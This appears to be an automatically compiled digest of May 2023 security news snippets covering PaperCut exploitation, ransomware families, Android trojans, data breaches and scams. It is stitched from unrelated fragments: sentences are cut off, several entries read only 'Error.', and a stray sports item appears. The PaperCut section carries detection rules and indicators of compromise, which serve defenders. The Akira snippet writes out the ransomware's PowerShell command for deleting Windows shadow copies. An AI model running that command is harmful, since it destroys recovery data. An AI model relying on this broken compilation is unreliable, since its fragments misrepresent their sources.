Fake Windows update (Malwarebytes) The researchers tracked more than a dozen domains used in the campaigns, many of them appearing to impersonate adult websites, that simulated the fake Windows update: activessd[.]ru chistauyavoda[.]ru xxxxxxxxxxxxxxx[.]ru activehdd[.]ru oled8kultra[.]ru xhamster-18[.]ru oled8kultra[.]site activessd6[.]ru activedebian[.]ru shluhapizdec[.]ru 04042023[.]ru clickaineasdfer[.]ru moskovpizda[.]ru pochelvpizdy[.]ru evatds[.]ru click7adilla[.]ru grhfgetraeg6yrt[.]site All of them served for download a file named "ChromeUpdate.exe," revealing the deception of the full-screen browser screen; however, some users were still tricked into deploying the malicious executable. "Autosummary:
These files using the ZIP format include Word (docx, docm, dotx, dotm, odt), Excel (xlsx, xlsm, xltx, xltm, xlsb, xlam, ods), and PowerPoint (pptx, pptm, ptox, potm, ppsx, ppsm, odp) document formats. BlackCat"s intermittent encryption (CyberArk) However, according to CyberArk, which developed and published "White Phoenix," this tactic introduces weaknesses to the encryption, as leaving parts of the original files unencrypted creates the potential for free data recovery. "Autosummary:
Encoded victim registration request (Fortinet) While the researchers did not observe any DDoS commands sent from the C2 server to the analyzed samples, they discovered that the latest bot version supports the following commands: Perform DDoS attacks (UDP, TCP, and HTTP GET) "Categories: Business How MSPs can prepare for the complex landscape of mobile malware. |
The post Navigating mobile malware trends: Crucial insights and predictions for MSPs appeared first on Malwarebytes Labs.
"Autosummary:
Safe web browsing Block ads and ad trackers Filters suspicious fraudulent texts Spam call blocking Malwarebytes makes mobile device security easy With Malwarebytes Mobile Security for MSPs, you can monitor and protect your clients’ mobile investments from a single pane of glass. MSPs can easily begin protecting Chromebooks, Android, iPadOS, and iOS devices, guarding against the latest mobile threats such as ransomware, malicious apps, and PUPs.Some features of a robust mobile threat defense product include: 24/7 real-time protection against emerging threats Advanced antivirus, anti-malware, anti-spyware capabilities Malicious app protection App privacy audit "Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: CVE-2023-29336 Tags: CVE-2023-24932 Tags: bootkit Tags: CVE-2023-29325 Tags: Outlook Tags: preview Tags: CVE-2023-24941 Tags: Apple Tags: Cisco Tags: Google Tags: Android Tags: VMWare Tags: SAP Tags: Mozilla Microsoft"s Patch Tuesday round up for May 2023 includes patches for three zero-day vulnerabilities and one critical remote code execution vulnerability |
The post Update now! May 2023 Patch Tuesday tackles three zero-days appeared first on Malwarebytes Labs.
"Autosummary:
Posted: May 10, 2023 by Microsoft"s Patch Tuesday round up for May 2023 includes patches for three zero-day vulnerabilities and one critical remote code execution vulnerability It’s that time of the month again: We"re looking at May"s Patch Tuesday roundup.The three zero-days are listed as: CVE-2023-29336: a Win32k Elevation of Privilege (EoP) vulnerability. "Categories: Awareness Categories: Personal Categories: Scams Tags: Tech Support Scams Tags: Malwarebytes Tags: impersonating Tags: screen lockers Tags: fake warnings Tags: remote access Tech support scams are an ongoing nuisance. Knowing how they operate helps you to recognize them. |
The post How to spot and avoid a tech support scam appeared first on Malwarebytes Labs.
"Autosummary:
For a very detailed breakdown of tech support scams, how they operate, and more suggestions to keep yourself safe from harm, please check out our dedicated tech support scams page. How to deal with tech support scams As a security provider with a good reputation, we do get a lot of impersonators, like in the example below. At the same time, the legal case against tech support scams originating in the US has proven to be difficult over the past few years, and prosecution has been limited.If your browser or mobile device “locks up”, meaning you’re no longer able to navigate away from a virus warning, you’re likely part of a tech support scam. "Autosummary:
Kingston"s SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it"s what"s inside the ".bin" that you can"t unsee: Lyrics of Coldplay"s 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103. "The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. PaperCut released a patch in March 2023.
According to FBI observed information, malicious actors exploited CVE-2023-27350 beginning in mid-April 2023 and continuing through the present. In early May 2023, also according to FBI information, a group self-identifying as the Bl00dy Ransomware Gang attempted to exploit vulnerable PaperCut servers against the Education Facilities Subsector.
This joint advisory provides detection methods for exploitation of CVE-2023-27350 as well and indicators of compromise (IOCs) associated with Bl00dy Ransomware Gang activity. FBI and CISA strongly encourage users and administrators to immediately apply patches, and workarounds if unable to patch. FBI and CISA especially encourage organizations who did not patch immediately to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.
Download the PDF version of this report:
Autosummary:
The following additional Emerging Threat Suricata signatures are designed to detect Domain Name System (DNS) lookups of known malicious domains associated with recent PaperCut exploitation: alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowcsupdates .com)"; dns_query; content:"windowcsupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowcsupdates\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdate .com)"; dns_query; content:"anydeskupdate.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)anydeskupdate\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdates .com)"; dns_query; content:"anydeskupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)anydeskupdates\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecemter .com)"; dns_query; content:"windowservicecemter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowservicecemter\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (winserverupdates .com)"; dns_query; content:"winserverupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)winserverupdates\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (netviewremote .com)"; dns_query; content:"netviewremote.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)netviewremote\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (updateservicecenter .com)"; dns_query; content:"updateservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)updateservicecenter\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecenter .com)"; dns_query; content:"windowservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowservicecenter\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecentar .com)"; dns_query; content:"windowservicecentar.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowservicecentar\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;) Note that these signatures may also not work if the actor modified activity to evade detection by known rules. alert http any any -> $HOME_NET any (\ msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; \ flow:established,to_server; \ http.method; content:"GET"; \ http.uri; content:"/app?service=page/SetupCompleted"; bsize:32; fast_pattern; \ reference:cve,2023-27350; \ classtype:attempted-admin; \ alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"page/SetupCompleted"; fast_pattern; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; reference:cve,2023-27350; classtype:attempted-admin; metadata:attack_target Server, cve CVE_2023_27350, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_05;) Note that these signatures and other rule-based detections, including YARA rules, may fail to detect more advanced iterations of CVE-2023-27350 exploits. title: PaperCut MF/NG Vulnerability authors: Huntress DE&TH Team description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: “\\pc-app.exe” Image|endswith: - “\\cmd.exe” - “\\powershell.exe” condition: selection level: high falsepositives: - Expected admin activity More advanced versions of the exploit can drop a backdoor executable, use living-off-the-land binaries, or attempt to evade the above YARA rule by spawning an additional child process in-between pc-app.exe and a command-line interpreter. Any of the following server log entries may be indicative of a compromise: User "admin" updated the config key “print.script.sandboxed” User "admin" updated the config key “device.script.sandboxed” Admin user "admin" modified the print script on printer User/Group Sync settings changed by "admin" Indicators of Compromise See Table 1 through Table 6 for IOCs obtained from FBI investigations and open-source information as of early May 2023. Download the PDF version of this report: TECHNICAL DETAILS Vulnerability Overview CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on the following affected installations of PaperCut:[1] Version 8.0.0 to 19.2.7 Version 20.0.0 to 20.1.6 Version 21.0.0 to 21.2.10 Version 22.0.0 to 22.0.8 Table 6: Bl00dy Gang Ransomware Malicious Files File SHA-256 Description /windows/system32/config/ systemprofile/appdata/roaming/tor/ N/A Unspecified files created in Tor directory /windows/temp/ socks.exe 6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15 Reverse SOCKS5 tunneler with TLS support (see https://github.com/kost/revsocks) Using the User/Group Sync interface to execute a living-off-the-land-style attack. "Autosummary:
Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out Microsoft, Exchange servers with the March update omit the vulnerable feature. "Autosummary:
This includes - Two C/C++-based binaries (wnet.exe and utility.exe) to enumerate all the resources on a network, A Python script (help.py) to establish an infinite communication loop with the C2 server and receive instructions to steal files with certain extensions, delete files created by other malware, and capture screenshots, and A C++-based malware (diagsvc.exe aka DownEx) that"s chiefly designed to exfiltrate files to the C2 server UPCOMING WEBINAR Zero Trust + Deception: Learn How to Outsmart Attackers! "Autosummary:
Infrastructure associated with the Kremlin-backed group has been identified in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, although its targeting is assessed to be more tactical, encompassing government networks, research facilities, and journalists. "Autosummary:
" Software Patches from Other Vendors In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including — (The story has been updated after publication to mention that the Patch Tuesday release fixes two actively exploited zero-day bugs, and not one as previously stated. "Autosummary:
"Autosummary:
CACTUS and Rapture are the latest additions to a long list of new ransomware families that have come to light in recent weeks, including Gazprom, BlackBit, UNIZA, Akira, and a NoCry ransomware variant called Kadavro Vector. "Microsoft warns of Iran-linked APT groups that are targeting vulnerable PaperCut MF/NG print management servers. Microsoft warns that Iran-linked APT groups have been observed exploiting the CVE-2023-27350 flaw in attacks against PaperCut MF/NG print management servers. The CVE-2023-27350 flaw is a PaperCut MF/NG Improper Access Control Vulnerability. PaperCut MF/NG contains an improper access control vulnerability within the […]
The post Iran-linked APT groups started exploiting Papercut flaw appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Iran) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "DEF CON’s AI Village will host the first public assessment of large language models (LLMs) at the 31st edition of the hacker convention this August, aimed at finding bugs in and uncovering the potential for misuse of AI models. The possibilities and the limitations of LLMs LLMs offer countless ways to assist users’ creativity, but it also presents challenges, particularly in terms of security and privacy. This event could shed light on the implications of … More
The post Finding bugs in AI models at DEF CON 31 appeared first on Help Net Security.
"Autosummary:
During the conference, red teams will put LLMs from some of the leading vendors, such as Anthropic, Google, Hugging Face, NVIDIA, OpenAI, Stability, and Microsoft, to the test. "Autosummary:
The ongoing assault comes weeks after Microsoft confirmed the involvement of Lace Tempest, a cybercrime gang that overlaps with other hacking groups like FIN11, TA505, and Evil Corp, in abusing the flaw to deliver Cl0p and LockBit ransomware. "Researchers warn of a new ransomware family called CACTUS that exploits known vulnerabilities in VPN appliances to gain initial access to victims’ networks. Researchers from cybersecurity firm Kroll have analyzed on a new ransomware family called CACTUS that has been spotted exploiting known flaws in VPN appliances to achieve initial access to targeted networks. The […]
The post New CACTUS ransomware appeared in the threat landscape appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CACTUS Ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Setting up C2 communication (Fortinet) AndoryuBot project The AndoryuBot malware supports 12 DDoS attack modes: tcp-raw, tcp-socket, tcp-cnc, tcp-handshake, udp-plain, udp-game, udp-ovh, udp-raw, udp-vse, udp-dstat, udp-bypass, and icmp-echo. "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
"40 people have been arrested, accused of the crimes of belonging to a criminal organization, bank scam, documentary falsification, identity theft, and money laundering," reads the police"s announcement. "Autosummary:
"To protect against this attack, a fix for the Windows boot manager (CVE-2023-24932) is included in the May 9, 2023, security update release, but disabled by default and will not provide protections," the company said. "Categories: News Categories: Ransomware Tags: MSI Tags: Intel Tags: Boot Guard Tags: firmware updates Tags: Money Message The leaked data after the ransomware attack on MSI includes private keys which could be used to bypass Intel Boot Guard |
The post Ransomware attack on MSI led to compromised Intel Boot Guard private keys appeared first on Malwarebytes Labs.
"Autosummary:
According to BleepingComputer, a Money Message operator said in a chat with an MSI agent: “Say your manager, that we have MSI source code, including framework to develop bios, also we have private keys able to sign in any custom module of those BIOS and install it on PC with this bios.” Update from vendor websites Although no attacks of this kind have been found in the wild and Binarly, after a lengthy and detailed analysis, states that “the leaked Boot Guard keys are intended for debug building lines and most likely we will never see such devices in the wild,” the advice to obtain firmware/BIOS updates only from official vendor’s websites is solid.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
"Paul Cha is a cyber and product security leader, serving as the VP of Cybersecurity at LG Electronics Vehicle component Solutions. Paul held critical positions at Synopsis, Ford Motor Company, and Samsung before joining LG. He found his way to cybersecurity while working on his Ph.D. in risk management. Paul started his career in cyber security work as a senior security solution development engineer, where he focused on smart appliances such as smart TVs and … More
The post Lessons from a 40-year-long automotive OEM leader appeared first on Help Net Security.
"Autosummary:
How struggling tier-one manufacturers can embed better security across their entire lifecycle As most manufacturers have complicated supply chain requirements and are moving toward software and cloud solutions, it becomes harder to handle complicated security issues. The main challenges faced by the product security industry The product security industry becomes more difficult as the world becomes more interconnected.As such, product security teams must continuously run TARA activities to enhance the quality of the product’s security. "Autosummary:
"AI technology is fueling a rise in online voice scams, with just three seconds of audio required to clone a person’s voice, according to McAfee. McAfee surveyed 7,054 people from seven countries and found that a quarter of adults had previously experienced some kind of AI voice scam, with 1 in 10 targeted personally and 15% saying it happened to someone they know. 77% of victims said they had lost money as a result. In … More
The post Your voice could be your biggest vulnerability appeared first on Help Net Security.
"Autosummary:
Using the cloning tools they found, McAfee’s researchers discovered that they had no trouble replicating accents from around the world, whether they were from the US, UK, India, or Australia, but more distinctive voices were more challenging to copy. 45% of the respondents said they would reply to a voicemail or voice note purporting to be from a friend or loved one in need of money, particularly if they thought the request had come from their partner or spouse (40%), parent (31%), or child (20%). "Autosummary:
"It was found that the operability of electronic computers (server equipment, automated user workplaces, data storage systems) was impaired as a result of the destructive impact carried out with the use of appropriate software," CERT-UA said. "Autosummary:
"Autosummary:
Please watch out , if you received one like this , toss it out because the QR code links to your bank account," warns the user, who has shared the picture of the fake citation: Fake parking ticket with a QR code seen in San Francisco (Reddit) Interestingly, the ticket seen on or before May 4th was dated in the future (May 5th) which would raise red flags. "However, the Singpass QR code provided by the scammers was a screenshot taken from a legitimate website, and by scanning the QR code and authorising the transaction without further checks, victims unintentionally gave the perpetrators access to certain online services," states the police warning. "Autosummary:
During this webinar, Yiftach will share his insights on how real-time MFA and service account protection can defeat ransomware attacks, and why identity-focused protection is the only way to stop lateral movement and ransomware spread. "Autosummary:
"Confirmed, Intel OEM private key leaked, causing an impact on the entire ecosystem," Alex Matrosov, founder and CEO of firmware security firm Binarly, said in a tweet over the weekend. "Western Digital is notifying its customers of a data breach that exposed their sensitive personal information, the incident took place in March. In March 2022, Western Digital was hit by a ransomware attack and in response to the incident, it shut down several of its services. The company disclosed that an unauthorized party gained access […]
The post Western Digital notifies customers of data breach after March cyberattack appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “Western Digital is currently experiencing a service outage impacting the following products: My Cloud, My Cloud Home, My Cloud Home Duo, My Cloud OS5, SanDisk ibi, SanDisk Ixpand Wireless Charger.” reads the status page of the company on April 2, 2023. "NextGen Healthcare suffered a data breach, the security incident exposed the personal information of approximately 1 million individuals. Healthcare solutions provider NextGen Healthcare suffered a data breach that exposed the personal information of informing approximately one million individuals. NextGen Healthcare, Inc. is an American software and services company that develops and sells electronic health record (EHR) software and practice management systems to […]
The post NextGen Healthcare suffered a data breach that impacted +1 Million individuals appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"The ransomware gang behind the attack on Taiwanese PC maker MSI leaked the company’s private code signing keys on their darkweb leak site. In early April, the ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Micro-Star International AKA MSI designs, manufactures, and sells motherboards and graphics cards […]
The post Money Message gang leaked private code signing keys from MSI data breach appeared first on Security Affairs.
"Autosummary:
According to Binarly, the exposed devices include multiple MSI laptop model series, including Stealth, Creator, Crosshair, Katana, Modern, Prestige, Pulse, Raider, Sword, Summit, Vector. "Autosummary:
"Autosummary:
"LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. |
The post Ransomware review: May 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by gang, April 2023 Known ransomware attacks by country, April 2023 Known ransomware attacks by industry sector, April 2023 Cl0p ransomware, which gained prominence in March by exploiting a zero-day vulnerability in GoAnywhere MFT, went comparatively silent with just four attacks in April. New players Akira Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The LockBit macOS samples analyzed by Malwarebytes seem ineffective due to being unsigned, not accounting for TCC/SIP restrictions, and being riddled with bugs, like buffer overflows, causing premature termination when executed on macOS. As Vice Society, Play, and other ransomware groups increasingly adopt advanced LOTL methods and sophisticated tools like Grixba, the capacity to proactively identify both malicious tools and the malicious use of legitimate tools within a network will undoubtedly become the deciding factor in an organization"s defense strategy moving forward. "This week on Lock and Code, we speak with Allan Liska about a new trend in ransomware delivery and development, and why it presents new challenges to organizations and law enforcement investigators. |
The post The rise of "Franken-ransomware," with Allan Liska: Lock and Code S04E11 appeared first on Malwarebytes Labs.
"Autosummary:
Instead, it is used almost "on loan" by criminal groups called "affiliates" who carry out attacks with the ransomware and, if successful, pay a share of their ill-gotten gains back to the ransomware’s creators. "Autosummary:
" Shelly-Ann Fraser-Pryce has won 10 outdoor world sprint titles, including relays Fraser-Pryce"s 100m gold came 13 years after her first and the 36-year-old has more world sprint titles than any other athlete. "Autosummary:
When executed, Akira will delete Windows Shadow Volume Copies on the device by running the following PowerShell command: powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" The ransomware will then proceed to encrypt files that contain the following file extensions: .accdb, .accde, .accdc, .accdt, .accdr, .adb, .accft, .adf, .ade, .arc, .adp, .alf, .ora, .btr, .ask, .cat, .bdf, .ckp, .cdb, .cpd, .cma, .dad, .dacpac, .daschema, .dadiagrams, .db-shm, .db-wal, .dbf, .dbc, .dbt, .dbs, .dbx, .dbv, .dct, .dcb, .ddl, .dcx, .dlis, .dsk, .dqy, .dtsx, .dsn, .eco, .dxl, .edb, .ecx, .exb, .epim, .fdb, .fcd, .fmp, .fic, .fmpsl, .fmp12, .fol, .fpt, .gdb, .frm, .gwi, .grdb, .his, .hdb, .idb, .itdb, .ihx, .jet, .itw, .kdb, .jtx, .kexic, .kexi, .lgc, .kexis, .maf, .lwx, .mar, .maq, .mav, .mas, .mdf, .mdb, .mrg, .mpd, .mwb, .mud, .ndf, .myd, .nrmlib, .nnt, .nsf, .nyf, .nwdb, .oqy, .odb, .owc, .orx, .pdb, .pan, .pnz, .pdm, .qvd, .qry, .rctd, .rbf, .rodx, .rod, .rsd, .rpd, .sbf, .sas7bdat, .sdb, .scx, .sdf, .sdc, .spq, .sis, .sqlite, .sql, .sqlitedb, .sqlite3, .temx, .tps, .tmd, .trm, .trc, .udl, .udb, .usr, .vpd, .vis, .wdb, .vvv, .wrk, .wmdb, .xld, .xdb, .abcddb, .xmlff, .abx, .abs, .adn, .accdw, .icg, .hjt, .kdb, .icr, .maw, .lut, .mdt, .mdn, .vhd, .vdi, .pvm, .vmdk, .vmsn, .vmem, .nvram, .vmsd, .raw, .vmx, .subvol, .qcow2, .vsv, .bin, .vmrs, .avhd, .avdx, .vhdx, .iso, .vmcx While encrypting, the encryptor will skip files found in the Recycle Bin, System Volume Information, Boot, ProgramData, and Windows folders. "Autosummary:
This is explicit in the ransom note: Cactus ransom note threatens with publishing stolen data source: Kroll Extensive details about the Cactus operation, the victims they target, and if the hackers keep their word and provide a reliable decryptor if paid, are not available at this time. In a technical report, Kroll investigators explain that there are three main modes of execution, each one selected with the use of a specific command line switch: setup (-s), read configuration (-r), and encryption (-i). "Autosummary:
"The San Bernardino County Sheriff’s Department confirmed that it has paid a $1.1-million ransom after the April ransomware attack. The San Bernardino County Sheriff’s Department opted to pay a $1.1-million ransom after a ransomware attack infected its systems in early April. The ransomware attack forced the Police department to temporarily shut down some of its […]
The post San Bernardino County Sheriff’s Department paid a $1.1M ransom appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, DLL ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"This vulnerability allows any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by tricking a privileged user to visit the crafted URL path," Patchstack researcher Rafie Muhammad said. "Autosummary:
Since then, multiple security companies have released detection rules for PaperCut exploits and indicators of compromise, including detections via Sysmon, log files, and network signatures. "Autosummary:
The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China. "In the first quarter of 2023 there was a significant increase in cyberattacks exploiting trust in established tech brands Microsoft and Adobe, according to Avast. The Avast report also found a 40% rise in the share of phishing and smishing attacks over the previous year. Overall, two out of three threats people encounter online today use social engineering techniques, taking advantage of human weaknesses. Malware, scams, and phishing attacks Malware, scams, and phishing attacks attempt … More
The post Think your data has no value? Scammers disagree appeared first on Help Net Security.
"Autosummary:
Malware, scams, and phishing attacks Malware, scams, and phishing attacks attempt to steal consumers’ sensitive data, like passwords, Social Security numbers, and other personal identifiable information.“Unfortunately, scammers have made it nearly impossible to take any message as face value – all communications, whether seemingly from a friend, boss, or household brand, have potential to be fraudulent.” "Autosummary:
"Joe Sullivan, the former Uber CSO who has been convicted last year for attempting to cover up a data breach Uber suffered in 2016 and kept it hidden from the Federal Trade Commission (FTC), has been sentenced to three years of probation plus 200 hours of community service. The conviction Sullivan became Chief Security Officer at Uber in April 2015, and in November 2016 testified before the FTC under oath that the company had taken … More
The post Former Uber CSO avoids prison for concealing data breach appeared first on Help Net Security.
"Autosummary:
"Cisco has revealed the existence of a critical vulnerability (CVE-2023-20126) in the web-based management interface of Cisco SPA112 2-Port Phone Adapters. The adapters are widely used to integrate analog phones into VoIP networks without the need for an upgrade. About the vulnerability (CVE-2023-20126) CVE-2023-20126 can be exploited without prior authentication. “This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device … More
The post Critical RCE vulnerability in Cisco phone adapters, no update available (CVE-2023-20126) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe. "Autosummary:
The list of the offending apps is as follows - Beauty Camera Plus (com.beauty.camera.plus.photoeditor) Beauty Photo Camera (com.apps.camera.photos) Beauty Slimming Photo Editor (com.beauty.slimming.pro) Fingertip Graffiti (com.draw.graffiti) GIF Camera Editor (com.gif.camera.editor) HD 4K Wallpaper (com.hd.h4ks.wallpaper) Impressionism Pro Camera (com.impressionism.prozs.app) Microclip Video Editor (com.microclip.vodeoeditor) Night Mode Camera Pro (com.urox.opixe.nightcamreapro) Photo Camera Editor (com.toolbox.photoeditor) Photo Effect Editor (com.picture.pictureframe) "When the app starts, it loads a heavily obfuscated native library containing a malicious dropper that decrypts and runs a payload from the app assets," Kaspersky researcher Dmitry Kalinin said. "Fleckpe is a new Android subscription Trojan that was discovered in the Google Play Store, totaling more than 620,000 downloads since 2022. Fleckpe is a new Android subscription Trojan that spreads via Google Play, the malware discovered by Kaspersky is hidden in photo editing apps, smartphone wallpaper packs, and other general-purpose apps. The malicious campaign […]
The post Fleckpe Android malware totaled +620K downloads via Google Play Store appeared first on Security Affairs.
"Autosummary:
